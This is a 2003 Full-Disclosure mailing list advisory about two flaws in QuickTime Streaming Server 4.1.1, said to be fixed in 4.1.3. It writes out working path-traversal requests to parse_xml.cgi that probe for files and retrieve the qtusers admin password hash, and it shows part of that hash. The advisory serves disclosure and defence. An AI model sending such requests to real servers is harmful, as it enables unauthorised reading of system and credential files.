-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Word. I've found two other issues in QuickTime Streaming Server v4.1.1 that seem to be fixed in the newest v4.1.3: 1.) File probing: Request: http://localhost:1220/parse_xml.cgi?filename=../nonexistent Response: 'Can't access HTML file '../nonexistent'!' [...] Request: http://localhost:1220/parse_xml.cgi? filename=../../../autoexec.bat Response: 'Can't open HTML file '../../../autoexec.bat'! [...] As you can see, this discrepency in the error message allows an unauthenticated user to "feel-out" the file system and determine what structures and files exist. 2.) File retrieval: Request: http://localhost:1220/parse_xml.cgi?filename=.../qtusers Response: "realm Streaming Server admin:$dufr$D9/.....$C4g2VaRK" [...] This works against the Win32 platform, and not against the Linux platform; this was not tested against Solaris or MacOS X. Word. - Joe Testa, Rapid 7, Inc. http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839 A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839 -----BEGIN PGP SIGNATURE----- Version: GnuPG v6.6.6 (X) iD8DBQE+X7N/V+UY4AKwCDkRApNaAJkBIiCYmP705zL3wt2tIoR7j2XbowCfeSmf OmiDhu+FpspKJpToTLZ5zRc= =Yq4D -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Fri Feb 28 2003 - 11:30:04 PST